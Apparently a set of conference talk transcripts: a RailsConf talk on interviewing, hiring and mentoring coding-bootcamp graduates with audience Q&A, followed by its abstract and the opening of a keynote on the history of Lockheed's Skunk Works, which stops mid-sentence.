So deploying stuff on platforms as services like Heroku, using version control stuff like Git, making sure that we can deploy something end-to-end and sort of work as working programmers. And these programs do teach to the test, quote-unquote, they have to, right? You can't properly train someone for interviewing and say, hey, you're really good at this particular technology stack. You understand how to do all kinds of crazy Git bisecting things and resolving merge conflicts. And you can work in a professional environment, but you are going to have some trouble doing graph traversals on a whiteboard, and that's how you're going to be evaluated. So there is some of that. Though I would argue really what the meat of these projects and boot camps is, is learning how to function as working software engineers. So like I said, resolving Git conflicts, merge conflicts, working and deploying and tracking down weird bugs, things of that nature. A friend of mine kind of thinks of it as physicists versus carpenters, this notion that like the physicist will tell you, yeah, what you've designed, that building won't fall down. That seems reasonable. But there's all kinds of hands-on stuff, right? All kinds of physical acts of pulling software that you don't learn as an undergraduate studying computing science. And I think it really boils down to sort of knowing that and knowing how. And I think we need both in order to have a meaningful education in programming and software engineering. So these are some of the things. Given this one big mistake that we make, this confusion of are you good at this thing and are you good at computing science, these are the things that I look for when I'm interviewing anyone, but particularly boot camp graduates or folks with non-traditional backgrounds. So the ability to write a non-trivial program. And by non-trivial, I mean something that does something in the world where you have network access or file I.O. or API calls. It's not just fizzbuzz, it's not just balancing a tree. Oftentimes I like to use problems that sort of are boiled down from or reduced from real problems that we have at Hulu. So I work on the ad platform team. My team, their job is to write the software that the sales planners and the ad traffickers use to determine what ads are, how ad campaigns are rolled out. Whether you see the same ad four times in a row, I'm trying not to do that. If you have seen four Geico ads in a row, I'm sorry, please come see me after the show and we'll fix it. But having some kind of pair coding challenge where it's like, hey, we have one Geico ad and other ads and how do we get a sequence of ads where we don't repeat ourselves however many times or we don't have two ads adjacent. Things like that. The ability to adapt to new and changing requirements. This is huge. This is probably the hardest thing to handle in an interview when someone says, great, that's a good solution, those tests passed, that looks nice. What about this? There's a new edge case or there's a bug or the client loves it and three weeks later there's a new request that completely turns on its head all the stuff that you just did. Working with that, changing nature, dealing with kind of ambiguity. Rarely do we get full specifications, complete requirements, very rarely does someone come to us and tell us exactly what they want. The ability to work well with others. This is why I want to do pairing and sort of collaborative interviews rather than adversarial ones. 
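To make that ad-sequencing exercise concrete, here is a minimal Ruby sketch of one way to lay out ads so the same ad never runs twice in a row. The greedy even-then-odd placement and the ad names are illustrative assumptions, not Hulu's actual interview problem or solution.

```ruby
# Spread ads across a break so no two identical ads end up adjacent.
# Greedy approach: place the most frequent ads into the even slots first,
# then fill the odd slots. Returns nil when it's impossible (one ad makes
# up more than half of the slots).
def spread_ads(ads)
  return [] if ads.empty?

  counts = ads.tally.sort_by { |_ad, count| -count }
  return nil if counts.first.last > (ads.size + 1) / 2

  ordered = counts.flat_map { |ad, count| [ad] * count }
  slots   = (0...ads.size).step(2).to_a + (1...ads.size).step(2).to_a

  result = Array.new(ads.size)
  slots.each_with_index { |slot, i| result[slot] = ordered[i] }
  result
end

spread_ads(%w[geico geico geico hulu netflix])
# => ["geico", "hulu", "geico", "netflix", "geico"]
```

In an interview setting the point isn't this exact algorithm; it's what happens on the follow-up, like how the candidate adapts when the requirement changes from "no repeats back to back" to "no more than two of the same ad per break."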
I think we should be working with interviewees and not literally challenging them to do better than someone else has done on this problem or do better than you yourself have done. Passing along the pain because you had to do this when you were interviewing. That was terrible and so everyone should feel terrible. We should stop doing that. The ability to work well with others is huge. To collaborate with someone remotely or in person and solve a problem. I look for people who are passionate about learning. People who deeply want to be better or to know more or to know why. It doesn't have to be computing science. It can be people who are passionate about learning the guitar or learning philosophy or learning music. I need people who are excited to learn and to become better because those are the people who are not going to be satisfied when ten clients are fine and one says, I have this weird bug sometimes but I guess it's fine because I don't see it a lot. It only happens on one machine or it only happens sometimes or someone has devised a bizarro workaround for some tool that you built and rather than actually fixing it, you're like, well, they seem okay. I want someone who is really looking to improve and to learn and to grow. Finally, self-awareness. This is the crucial one. This is the one that underscores and informs and reinforces all the rest. People who are self-aware understand how they come across to other people. They understand how to work as part of a team. They understand how to manage the changing dynamic not just of the code but of the people they're working with. When people change roles, when people join, when people leave, being able to deal with all these things, the root of this is self-awareness. I encourage you to try to, when interviewing, figure out what signs are associated with self-awareness and then look for those because I think without self-awareness, we're really in trouble. Finally, this last one on the slide. Peter Norvig. There's a link to this. I'll tweet the slides so you don't have to memorize a shortened URL. Peter Norvig found actually a negative correlation, not a non-correlation but a negative correlation between people who are good at whiteboard interviews, traditional interviews, and job performance. I don't think that means that people who are good at interviewing are necessarily bad at software engineering. What I think it means is that interviewing is a separate skill from the jobs that we do. There are people who are very, very good engineers who are not good at traditional interviews. There are people who are very, very good at traditional interviews who are not very good engineers. That brings us to our next hand-raising exercise. Raise your hand if you now are or have ever made the jump from individual contributor to manager. If you're familiar with that jump to management, keep your hand in the air if you believe that the very best developers make the very best managers all the time. My hand also went down. We understand intrinsically there is a difference in these skill sets. Being an excellent developer does not make you an excellent manager. It's a separate skill that can be learned. Interviewing is the same deal. Interviewing is a separate skill from software engineering that can be learned. Yes, you can go out and get really good at interviews and get tons and tons of offers, but I don't think that's the right answer. I think the right answer is to fix interviewing.
I think this kind of identification of the mistake we're making and actively taking steps to address it is part of that. Now, I'm obligated to tell you that Hulu is hiring. If you're interested in working at Hulu, come find me. I put a card up on the job board. I'm always happy to talk about what we're doing at Hulu, what my team is doing, things like that. My contact info will also be up on the final slide if you want to send me an email or tweet at me or come find me on GitHub or something like that. Now we've looked at what interviewing can be like or what problems with interviews that there are that we can address. We've looked a little bit at how boot camp graduates differ from those with more traditional backgrounds, getting a sense of how we might modify our practices. I want to turn now to how we can help folks grow and learn on the job. I also want to underscore again, this is kind of a fib. This is kind of like a misleading talk title because this is about everyone, not just about boot camp graduates, although, like I said, it's a good lens for investigating this. If you take nothing else away from this talk, I'd like you to take this away. This is the most important thing in the entire talk. The belief that you can improve, that you can grow, and moreover that your culture is one of growing and learning and getting better. It's super important, so I'm just going to read it to you, even though I hate when people read things to me. The belief that you can improve your abilities results in better performance than if you believe you either have it or you don't. Carol Dweck, I hope I'm pronouncing her name correctly, wrote a paper a bit ago, is math a gift? Beliefs that put females at risk. Later, a book, she also wrote, called Mindset, New Psychology of Success, which investigates this kind of dichotomy. Are we born with it? Are we talented? Are we innately good? Or is this something that we learn through practice? It turns out when you prime someone on a task with the belief that they can get better through practice, they will actually do better than if you prime them with, like, don't worry about it. Some people are good at math, some people aren't. Here's a math test. They will do worse than the people who you say, listen, no pressure. This is a thing you can get better at through practice and dedication and it's a learned skill. So like I said, if you take nothing else away from this talk, please take this away, that the belief that you can grow and making sure your culture is one of growing and getting better is what underpins the whole thing. So there's a bit of a talk within the talk here, this kind of talk-ception type thing. So more exercises. How many of you, this is your very first RailsConf? Oh, wow, that's awesome. Cool. I'm a little bit of a little labor here and I'm always super excited. So welcome. This is really cool that you're here. If you were at RailsConf two years ago, Chuck Larvos did a talk called Building Kick-Ass Internal Education Programs for Large and Small Budgets. And so if you saw that, that's awesome. If you haven't seen it, I encourage you to watch it. The links to the slides and to the YouTube video are here on the slide. But if you didn't see it, you don't have to wait. I'm going to kind of TLDR it for you because I think all of his ideas are awesome and are part of growing people who you've now welcomed into your organization. So here's the plan real quick. One you don't have to know everything, which is good. Second, start Monday. 
This is something that you can do immediately. This is not something you have to wait for. This is not something, hopefully, that you need tons of approval to do. Two examples of things that we can do are lightning talks. They're lightning talks here at RailsConf. They're lightning talks at Meetups. You can bring them to your organization. They can be about anything. You can also do kind of more in-depth workshops, lunch and learns, kind of a weekly, maybe half hour type thing, and talk about XYZ. We'll cover a couple topics that I've found in my career have been valuable. And finally, the idea of the Accountability Buddy. This is good for a lot of things, and we'll touch on all of them. But essentially, pairing new hires with people who are more experienced in the organization to help with onboarding and things like that. So we'll go through these in a little bit more detail. And hopefully my speaking speed is still good. I'm getting really amped up. This is like my fourth cup of coffee, too. I haven't seen any waving or flailing, so that's good. I'm not going too, too fast. So one, like I said, you don't have to know everything. The good news is you literally can't. I know I just told you that I should be priming you on things that you can learn and get better at, but unfortunately, you cannot get better at knowing everything. It is impossible. So don't worry about it. So I can teach someone how to do something is an excellent way to learn it yourself. So if you teach someone something, you're not only spreading knowledge through your organization, you're getting better at it. You encourage someone else to teach things. They get better at it. And it's sort of a domino effective of goodness, which is nice. And this kind of little zen bit at the end is just my reassuring you that you don't have to know where you're going. You can start this on Monday and not have an end in mind. That is totally fine. As long as you keep working on it, it will grow organically. So please do start on Monday when you go to work. It's Monday, May 9th, 2016, this coming Monday. You should feel empowered to do this. This is something that you shouldn't really need your bosses, bosses, bosses signature in order to go and go do. So I encourage you to sort of take this into your own hands and start this education program yourself. And like I said, you don't have to know everything. You don't have to know where it's going. You just have to have a couple of seeds. And like I said, we have a few slides ago, we solved interviewing forever, which is awesome. So now that interviewing is solved, hopefully the folks in your organization are interested in growing, interested in learning. They should be pushing already to do something like this. You should have something kind of like bubbling under the surface if you don't already have an internal education program. So hopefully momentum will be easy to achieve. Like I said, lightning talks are an excellent way to start this. You can say on Monday, hey, we're doing lightning talks on Friday, 4pm, and prepare something. That's a good first step. They can be technical, they can be non-technical, they can be in-house. You can do the meetups, you can practice your next RailsConf talk as a lightning talk. The sky is a limit. And remember that teaching something is a great way to learn it. Lightning talks are, like I said, a part of RailsConf. You should totally sign up to do one. I don't know when and where signups are. 
I do know that the lightning talks this year are Thursday from 5:30 to 7pm. I think that it's in the RailsConf documentation and all the excellent stuff that we've gotten from the RailsConf organizers. So I encourage you to sign up for one, or at the very least go see one so you can get a sense of what lightning talks are like and what you might be able to bring to your organization. Again I apologize for throwing a bunch of links at you. These will be much more valuable when the slides are online, which will be later today. These are just some gists that I've picked up over the last couple of years to sort of come up with curricula, right, for in-house programs. So the ones that have been really valuable are Git. And these tend to be more valuable for actually folks who do have computing science backgrounds who have not necessarily worked with lots of other developers on huge projects. So learning Git, right? Learning how to rebase and squash commits, learning how to use Git bisect, which is huge. So there's a link here that kind of just goes through like 10-ish weeks of Git in half-hour trainings. ECMAScript 6 or 2015 or 2016 or JavaScript next or Harmony or whatever it is we call it. There are a lot of people who are super interested in this, but maybe you're working on an older code base and you don't have the opportunity to switch it up. Again this is something that even folks with a traditional background might be interested in because you probably don't get a chance to do a lot of JavaScript in undergrad, which is probably good. And these last two I think are valuable for folks who have backgrounds that are non-traditional. These are functional programming. This is through the lens of JavaScript. It can be functional programming in Ruby or Python or what have you. And the last one is data structures and algorithms for web development. So when you do have a tree problem, when you do have a graph problem, you can go through these exercises and you can use these hopefully as a basis for your own education programs. And again these are just, they've been edited, revised, they're constantly growing and changing. And I think being open to that change is huge. So if you say hey, Friday at lunch, we're doing lunch and learns, here's the topic or here's some topics, like we should kind of vote on what we want to do, we should go in this order, we should talk about this thing. Again they're going to kind of evolve and grow organically. So I encourage you just to get, just kind of plant the seed, plant the tree and let it grow. And finally, accountability buddies. This is the obligatory South Park reference, which is a Hulu show. If you don't subscribe to Hulu, you can subscribe to Hulu and you can watch South Park. My boss did not tell me to do that. So the idea is to pair new people with a mentor from the organization for say the first three months. I think Chuck in his talk said onboarding time went down drastically by doing this. It was something like it took six months to spin somebody up before they instituted the program and now it takes three. So you can expect, anecdotally I've had similar results. You can expect a very noticeable reduction in onboarding time simply by having a mentor for someone to go to and say hey, how do we deploy this thing? What does this service do? How do I make coffee? Like all these things that you want to know very early on in your time at a new company that say HR is not going to be able to help you with.
It's not benefits related, it's not things like that. It's kind of the day in, day out of developing software or staying alive in the case of coffee. And like I said, this is a thing you can do immediately. So I think this is the last hand raise I'm going to inflict on you. Raise your hand if you feel prepared to do this on Monday, May 9th, 2016. Even just to like send out an email or a HipChat or a Slack thing and be like hey guys, what do you think of this? I feel like I don't see enough hands up. We'll talk after if you feel unprepared. We will get you prepared. You'll be good. And that's the end of the audience participation so you guys can relax now. I'm not going to call on you. Okay, so you've gotten this far, thank you. This is the TLDPA, the Too Long Didn't Pay Attention. This is sort of the whole talk in three bullet points. So essentially it's this. I would encourage you to write down what you're looking for when you're interviewing someone. I mean actually like write it down. Say here are the skills that we're looking for. Here are the personality traits. Here's what we want people to know how to do. Here's what we like. Here's what we need. And compare that against what you're interviewing for. And if you're not getting at those things with your interviews, it shouldn't be surprising to you that you're not finding the right folks. And hopefully this is kind of like an oh man, eye-opening type of thing. This is not meant to make anyone feel bad about interviewing. Like we said, there's a reason there's like an "interviewing is broken" blog post like every week. And hopefully this is a nice way to fix it. And like I said, we'll help fix it. But you know, oftentimes what you're not, you're not looking for someone who is a computing scientist. Sometimes you are. Sometimes you have very academic problems or problems that have a very traditional route. And that's great. You should, if you need someone who can write a red-black tree and balance it from memory or AVL trees or splay trees or other data structures that I only know the names of, that's fine. You should hire those people. But oftentimes that's not what we need. And we should be aware of that. I think also that we need to look for strengths, identify what makes someone shine, what makes someone valuable rather than probing for weaknesses. Because we're always going to be disappointed if we probe for weaknesses, right? Like we're going to be disappointed if we find one. We're going to be sort of mad if we don't. Like all right, well whatever. Like I guess this person is way better than me. That's fine. Hopefully that doesn't happen. But essentially we want to know what someone can bring to the table and not focus on where their weaknesses lie. Second, like I said, this is the whole theme of the talk. I encourage you to take this away if nothing else. Believe in improvement. Believe that you can be better. Believe that improvement is part of what we do all the time and work to make that part of the culture. And finally sort of be the change you want to see in the company. I'm reasonably sure I stole this from Gandhi in some capacity. But it's not just the code base. It's not just the kind of the Boy Scout rule of leave things better than you found them. Finally you need to apply this to your culture to identify what it is that you need and want, how to get better, and to iterate on your culture the same way that you iterate on your code. Because fundamentally all tech problems are people problems.
At some point in the chain of events, some human was typing stuff into a keyboard. So I encourage you to keep that in mind that every single problem that we have technically is also at its heart a people problem. And that's nice because while machines are little deterministic or non-deterministic boxes of feelings that do what they want, humans are also kind of like that but are easier to understand, I think. Anyway, so thanks again for coming to my talk. I really appreciate it. Like I said, if you have questions, we'll take time for questions. For some reason we don't have time. Please do feel free to come up to me and look for me all throughout the rest of RailsConf. I'll be here. Like I said, all my contact info is up here on this slide. So feel free to reach out. If you do want a copy of Ruby Wizardry or you have questions about it, please let me know or feel free to take advantage of the discount code. And thanks so much. Sure. So the question is for bootcamp graduates, they often have portfolios of work. Do we read their code? You might have seen if you read Hacker News, which I try not to, or at least not the comments. There was a blog post recently that was like, you know, forget you. I'm not going to spend two hours reading your code. I'm not going to spend two hours reading your stuff. I'm not going to look at your website. I strongly disagree with that. I do a lot of interviewing. I'm super busy all the time. I make time to look at portfolios. I make time to read stuff on GitHub. I'm not going to read everything. I might just kind of go straight. If you have a Rails application, go straight for your controllers and see what's going on because there's a lot of doom there. I might go and take a look at a project you've done. I might pop the console and kind of dig around in the JavaScript and say, oh, this person is using React. That's really cool. I might go and look and see how you're thinking about structuring JavaScript applications or how your Ruby application is built or if it's a language I've never seen before. Try to learn something new. But yeah, the short answer is I do, if there's a portfolio or a GitHub profile or something like that, I do try to read that because I think it's super valuable. Sure. So the question is we get a ton of applications, at least in terms of bootcamps, for every single position that is appropriate for someone who's graduated from a bootcamp in terms of background and skills. How do we do a first pass? How do I cut that down to a reasonable manageable number? So some things that I do, and these are sort of ad hoc anecdotal, I read resumes pretty carefully. I know that this is going to be frowned upon by some folks, but I look to see if someone has updated their resume that it's the most up to date, I will take a look and say, hey, are these things spelled right? Are these technologies that we use? Are these things that we're interested in? I'm kind of a weird stickler for that stuff, but I firmly believe that in the age of spell check and the age of being able to ping someone in your organization and say, hey, can you look at this or I guess not your organization because then they would know that you were interviewing. But your friends would be like, hey, can you look at my resume? Can you look at my application for this job? I firmly believe that people who are really spending a fair amount of time or are interested in an organization will go ahead and do that. Essentially science, it's someone's kind of shotgunning, right? 
And it's easy to do. And it's really stressful when you're coming out of a program like a bootcamp and you kind of want to maximize your chances for success. It feels like it is kind of a heavy ask. Like, well, do you super want to work at Hulu or do you just want to sort of work somewhere? Right? But again, like I said, the culture stuff, the desire to learn, the desire to grow, the desire to do meaningful work, I think is sort of tied into people picking and choosing the places that they want to interview. And so I kind of look for signs that this person has looked at my organization in particular on purpose. So oftentimes, like things that don't come with a cover letter, I'm kind of bummed. Like I like to read cover letters. I like people to explain why they want to work on a particular problem or a particular team. So that tends to actually screen about half of people. Half of people have something about it. And I apologize for being a human who is swayed by things like typos. But it basically shows that people seem interested. And I'm actually super interested if you guys have ways of doing this or things I can do better. Because like I said, this is an iterative process. So I'd love to get better at interviewing. If you guys have tips, please do come find me. Sure. So the question is, is there anyone at Hulu or I suppose anywhere really who's not swayed by this, who kind of thinks interviewing is not broken, that it's fine the way it is, and what would be my advice to folks coming out of boot camps to win these people over? Yeah, the answer is for any sufficiently large organization, you're going to find this. I do know people everywhere who firmly believe that if you can't do a graph traversal problem on a whiteboard, you don't deserve to work as a software engineer. That there's no space for people who don't have that background. That somehow they're missing something so fundamental that the only solution is to go learn that thing and come back. And that is one option. There are books like Cracking the Coding Interview. There are a number of websites that kind of teach you dynamic programming problems. They teach you graph traversal, tree traversal, things like that. So you can meaningfully tackle 80% of whiteboard interviews in D5. That is one option. I found in my career that it is impossible to reason people out of positions they didn't reason themselves into. So if someone has reasoned themselves into the belief that you need to know these things, I think logic does seem to work pretty well. So I'll sit in and we do debriefs, we do little round tables after interviews. And someone will say, well, this person, we're interviewing them for a front end job or interviewing them to work on a legacy Rails application. And they do have 10 years of experience doing Rails stuff, but I asked them a dynamic programming question and they couldn't really do it. And I'll say, OK, well, what dynamic programming problems have we done recently? What is the impetus for this idea that what you're interviewing for is valuable for the thing that we need? That's sort of how I win them over. I think as a bootcamp graduate, the best you can do is kind of say, hey, listen, this is a thing that I think is interesting. Here's the best solution I've got. Does it seem reasonable in an interview? And it's hard to not want to just throw the marker and give up and be like, listen, I can't do this. It does seem reasonable to say, can we work on this together? That works maybe half the time.
Sometimes the interviewer just thinks that is like an ask for a pass and that's no good. But I think most interviewers, if you say, hey, here's what I think seems reasonable. You just give it the ugliest, brute-forciest, naïve solution you can, and say, does this seem to work? And then most interviewers will say, yeah, that does work or that doesn't work. Or did you think about this? And then they're willing to sort of work with you on it. Short term, unfortunately, the best answer might be to learn how to do these things while people hopefully like us, like me, like you kind of go and try to promulgate this new theory of, or maybe not new, this hopefully better theory of interviewing. It will take time, but I'm optimistic. Sure. So the question is, can I expand a little bit on what I mean by self-awareness and down the line sort of what does that look like? Does that sound cool? So when I say self-aware, what I mean is the person is nice, right? This is someone you enjoy talking to. This is someone who will not talk over you, right? Some examples. Sometimes I will purposely say something that's sort of a generality. It's not quite right. It's close. I'm going to listen to see if that person will say, well, actually, and I guarantee you, for like 99.99% of sentences that start with, well, actually, you should just stop listening to the rest of that sentence because it's not useful for your life. I will spend some time saying, okay, well, you know, I try to avoid like the very transparent like, tell me about a time you had a disagreement with a coworker, right? But say, hey, so that sounds really cool. That doesn't sound like, that seems like an unorthodox way to do that. What did your team think of that? Or what did your boss think of that? Or hey, it's really cool that you're using Elixir at work. How hard was it to kind of get buy in? Like how did you do that? And look for clues. Like did that person sort of stampede people? Did that person kind of put it out there and everyone kind of said, no, and they sort of did it anyway, right? Like we've, we've all seen people who kind of go off and sort of do their own thing. Getting a sense of does the person seem empathetic to the problems that you have in your organization when you describe it? Or do they kind of say, oh, I know how to solve that. Or that's a dumb problem. I don't really care about that problem, right? Sort of do they seem aware of how they come across? Like do they seem aware if the interview is going well or poorly? Things like that. In terms of how that sort of evolves over time, I found that people who are more self-aware in organizations tend to do much, much better. And again, because working at an organization, you're working as part of a team. You have to be aware of how you come across. There have been some exceptions where I know people who are not super self-aware, but they've managed to find like a manager who's like, who is, and they're like, oh, don't worry about so and so. Like here's when they said that thing, here's what they meant. Or here's, here's actually like, I know that came across kind of harsh, but here's actually what they said. And that can sometimes work if you've got someone who's super, super talented but has trouble. But I found most people will do their best to, if it's kind of quietly brought to their attention by a peer or a superior, they'll try really hard to be better. I hope that kind of answers your question. Right. Right.
So the question is, is there something above and beyond sort of as you're growing people beyond these kind of like periodic touch points to ensure that your employees are growing, that the organization is, essentially the communication is still working is what it sounds like. So certainly having those, those periodic touch points are valuable and I think necessary. So you do want to have one on ones with your team members. You do want to make sure that there are larger team meetings less frequently that sort of are used as two-directional conduits. And I think that's probably part of it. So above and beyond having these touch points, I think it's important for meetings between like management and your team or however your organization is broken down are two way. Right. So it's not just the organization, you know, the business leads coming to you and saying, hey, here's, give me a status update. Right. And then sort of them knowing what engineering is doing secretly when they're not watching. It's I think more about having a two way communication. Like when I do one on ones, I make sure that I say, you know, is there anything you need from me? Am I blocking you? Is there anything that you want to talk about, stuff like that? But I'll also say, hey, here's some things that I know are happening soon. And you might need them for context and why we're prioritizing a particular project. You might need it to sort of understand why we're being asked to do what we're doing. And I think that's valuable. Right. Because no one really likes to work in a vacuum. So making sure that communication is two way, I think is super valuable. Another thing is to, like I said, make sure that this notion of growing and getting better is a truly cultural thing. Right. Culture is always, always, always set at the top of your organization. So if at the very top, there's no buy in for an internship program or there's no buy in for continuing development, if there's no buy in for programs like that, it's going to be, it's going to be hard. And like I said, this is something you should feel empowered to do on your own. And I think you can, you can grow it up to the top. But if you meet active resistance, right, like we're not spending money on that, we're not spending time on that, you guys should be pushing features and not learning things. That's a signal to go somewhere else possibly. So I guess above and beyond those touch points, those two things seem appropriate to me. Making sure that communication is always two way and making sure that you do everything you can to kind of pass upwards. So like when I have one of those with my boss, he'll tell me about what's going on. But I'll also say, hey, like my team is super interested in this. Can you push this along? And so you can have a large effect for just your team, just doing it yourself, and things will go well. But I found that the multiplier is having the folks at the very top also. Cool. So we're, we're at time. I don't want to impinge on the next talk. So thanks so much guys and please do find me. I assure you are the janitor's staff here.
|
In 2015, nearly a hundred programming boot camps produced thousands of graduates in North America alone. While boot camps help address a need for professional software developers, their graduates have different skill sets and require different interview assessment and career management than fresh college graduates with degrees in computer science. In this talk, we'll look at how boot camps prepare their students, how to interview graduates, and how to help them continually learn during their careers, developing a holistic model for hiring and growing boot camp graduates in the process.
|
10.5446/31504 (DOI)
|
I am very pleased to introduce our first evening keynote for RailsConf this year. Nicholas Means did a talk at RubyConf last year that was called How to Crash an Airplane. And I remember looking at this as it came through the CFP app and thinking this is going to be the most depressing talk ever. Because it's a talk about an airplane crash in 1989 in which 111 out of 239 people were killed. The amazing part of course being that not all 239 were killed. But it turned out to be a really, really interesting meditation on how people and computers interact with each other. Anyway, so when I saw this talk come through the CFP for RailsConf this year, I thought this is a talk that needs a wider audience maybe. And I was very pleased when Nicholas agreed to do this as a keynote. So please join me in welcoming Nicholas Means. All right, so I hope you guys have seen a lot of really great talks today and met a lot of really interesting people. Like Sarah said, I gave a talk at RubyConf this fall about United Flight 232. And in the intro to that talk, I said that I was a student of plane crashes. That's true. I am a student of plane crashes. I'm very fascinated by what goes on in the cockpit. What chain of events causes a plane to crash. But it's not the whole story about my interaction with aviation. I'm actually a huge aviation buff in general. And I have been as long as I can remember. I've loved planes as long as I can remember. I think it all started when I was eight or nine years old and my parents took me to an air show at Dyess Air Force Base in Abilene, Texas. The featured attraction that day were the Thunderbirds, the Air Force's F-16 demonstration team. And they did all sorts of high-speed acrobatics. They flew in tight formations. It was amazing. It was incredibly impressive. But as great as they were, they weren't the thing that captured my imagination that day. The thing that really stuck in my young mind was standing nose to nose with this amazing machine, the SR-71 Blackbird. It's my favorite plane. I'm sure for plenty of people in the audience that's your favorite plane, too. It's an amazing machine. You can just look at it and tell how fast it wants to go. It's got those razor-sharp leading edges, smooth curves. The engines are every bit as large as the fuselage. You can't really tell it from this angle. But seeing this plane, seeing it up close, and hearing about what this plane could do, started a lifelong obsession with aircraft for me. I went back home. I was in elementary school at the time, and this was before the Internet. So I went to my school library, and I had the librarian pull every book she could find that even mentioned the SR-71 for me. And I started reading about this plane, and I really haven't stopped since. Well, years later, my career has taken a decidedly non-aviation turn. I am the VP of Engineering at iTriage and WellMatch, and I spend my days leading teams of software engineers, but I'm still fascinated by airplanes and by stories from the world of aviation. Sometimes I even find wisdom in these stories about how we practice our craft and how we lead our teams. The story of United 232 was very much one of those stories for me, and this is one of those as well. So if you see an SR-71 in a museum somewhere, you should look for this logo on the tail. It's not always there, but sometimes it is. The reason for this skunk is that the SR-71 was designed by Lockheed Martin's Advanced Projects Division, better known as the Skunk Works.
Now, companies use the phrase Skunk Works for all sorts of things, usually some top-secret project where they need a bunch of innovation and a hurry. But Lockheed Skunk Works was the original one. And today I want to tell you the story of some of Skunk Works' most iconic planes and the amazing engineers that built them. And to do that, I have to start with Clarence Kelly Johnson. Without him, there would be no Skunk Works. Kelly graduated from Michigan in 1932. He applied for work at Lockheed, and he was turned down. He went back to Michigan to get his master's degree in aeronautical engineering, and after he got his degree, he went back to Lockheed, and he was hired, not as an aeronautical engineer, but as a tool designer, for 83 bucks a month. Slowly, but surely, Kelly worked his way up the ranks. And the first plane he designed that you would probably know of is the P-38 Lightning. Now, if you've studied World War II aviation at all, if you've ever been to a World War II aviation museum, you have seen this plane. It's one of the most famous planes of World War II, and it was one of Pilot's favorite planes to fly. It was very successful in dogfighting. So Kelly kept himself busy working on that until intelligence started to come in that the Germans had developed a new plane, the Messerschmitt ME-262. Now, what made this plane remarkable is it's the first jet fighter that was ever placed into service. It was faster than anything the Allies had. The Germans had invested in jet propulsion far earlier than anybody else, and they were way far ahead of the Americans. Now, the British had offered the DeHavilland H-1B Goblin engine to the US, and the Air Force held a meeting with Lockheed and asked if they would be interested in designing a plane around this engine. The Air Force proposed that Lockheed build a single prototype, and they designated it the XP-80. Well, all along, Kelly Johnson had been pestering his bosses at Lockheed to set up an experimental aircraft division where he could let engineers and designers and mechanics work in close proximity to each other and communicate directly, not have to go through all the bureaucratic channels at Lockheed. And this seemed to the higher brass at Lockheed to be a perfect opportunity to give Kelly Johnson that. The only problem was Lockheed had no factory space available. This was in the middle of World War II. All of their facilities were busy manufacturing the P-38 Lightning. And so Kelly Johnson's first order of business was to rent a circus tent. He set this circus tent up next to an existing building on the Lockheed grounds. He installed phones, air conditioning, everything he needed to make it an office. The building he set it up next to was a plastic factory. And apparently it smelled terrible. So the XP-80 was a top secret. The team had been briefed to not reveal to anybody what they were working on, even when they answered the phone. And so because of the smell, Irv Culver, one of the structural engineers on the project with a reputation as a bit of a cut-up, took to answering the phone, Skunk Works, how can I help you? And the name stuck. So that's how Skunk Works became Skunk Works. And the contract for the XP-80 was signed on June 24th of 1943. And the team had been given 180 days to build this plane. The only concrete information they had was the dimensions of the engine. They didn't even have a mock-up. They had to build that themselves in-house from the blueprints. And they designed the plane around this engine. 
Normally they would have mocked up the whole plane before they started on building the production aircraft. But not this time. Kelly Johnson decided that the plane itself would be their mock-up. That they wouldn't mock the plane ahead of time. And his engineers would be free to design and manufacture parts on the spot to fit this plane. He also decided to do away with Lockheed's normal drawing approval process. He decided that if they were going to bring this plane in on time, they had to work fast. And that meant doing away with all the formality they were used to working with. So he cut all the style rules and approval chains that would normally apply to airplane drawings at Lockheed. And it worked. By November the 13th, they were done. Just 143 days from when they started, they had a complete plane. They took that plane apart, crated it up and loaded it on a flatbed truck and drove it 70 miles east to Muroc Air Force Base in the middle of the Mojave. Now, why did they do that? Because they needed lots of room for this thing to crash. They had no idea how it was going to perform. But it performed beautifully. After New Year's, it took flight for the first time and it flew like a dream. The prototype they flew that day would actually go on to be the first American plane to fly 500 miles an hour in level flight, the fastest plane built to that day. The production version, the P-80 Shooting Star, would go on to be the first jet deployed by the Air Force. And it flew well into the 80s. So they completed their mission in an unrealistic amount of time. They delivered this plane. But it started to look like maybe that would be the end of Skunk Works. This was the end of World War II. There wasn't a lot of money available for developing new aircraft. The Pentagon decided they really didn't need any new airplanes with no war going on. But that stance didn't last very long. This picture is of Winston Churchill, FDR, and Joseph Stalin at the Yalta Conference in February 1945. This is one of the three conferences that the big three World War II allies had to determine how they were going to govern Europe after the war. This particular conference is the one where they decided they would split Germany down the middle and split Berlin with it. These three superpowers had united against the Axis powers during World War II, but that alliance didn't last very long after World War II. American and Russian ambitions were too much in conflict, and they quickly began ramping up military spending to make sure they kept up with each other. We had entered the Cold War. In addition to ramping up military spending, the other thing that ramped up was reconnaissance activity. Around this time, you have to understand that 55% of the American population thought that it was more likely that they would die from thermonuclear war than old age. And those fears weren't unfounded. Both sides needed to know what the other was up to, and they were willing to spend a ton of money trying to figure it out. The CIA was desperate in particular for information on this place, Kapustin Yar. This is Russia's primary secret missile development area. It's akin to Area 51 in the United States. And the Air Force considered an overflight of Kapustin Yar to be far too dangerous to do with any of the aircraft they had at the time. It was very heavily defended. They knew there was no way they could get in and take pictures and get back. So the CIA needed a different answer.
Their intelligence indicated that Russian radar couldn't see over about 65,000 feet, so they decided to spec out a plane that would fly at 70,000 feet. Well, nothing had ever flown that high before, but they requested bids. And since they had no means of reconnaissance over Russia until this plane was ready, they needed this plane in a hurry. The bid request they put out called for this plane to be ready in eight months. So Skunk Works took a plane they had earlier developed, the F-104 Starfighter, which coincidentally is the first plane ever built that went Mach 2. It could go two times the speed of sound flying level. They took this plane and proposed that they modify it by dumping as much weight as they could, stretching the wings out to be as wide as they could, and changing the engine out to something that would function at 70,000 feet because nothing had ever flown that high before. They didn't know how to build a jet engine that would fly at 70,000 feet. Because their proposal was based on an existing plane, along with Skunk Works' proven capability on the P-80 and the F-104 to deliver on time on tight deadlines, it won over the other manufacturers' proposals of new planes. The plane they built, of course, is the U-2. They started work in November of 1954. They took the U-2 and they lost as much weight as they could. They took the fuselage, made it as thin as they could, made it out of wafer-thin aluminum. It was so thin, in fact, there's a story that an engineer accidentally bumped into this plane with a toolbox. On a normal plane, that would be no big deal. But on the U-2, it left a four-inch dent in the side of the fuselage that they had to pound out. There was some concern that this plane would never be strong enough to fly. But eight months later, in July 1955, right on time, they had a plane ready. They crated it up, loaded it into the belly of a cargo plane, and flew it out to a purpose-built airfield in the middle of a dried-out lake bed in the Nevada Desert. Why the Nevada Desert? Because they weren't sure this plane would fly, and they needed lots of places to land it. This picture, taken by Kelly 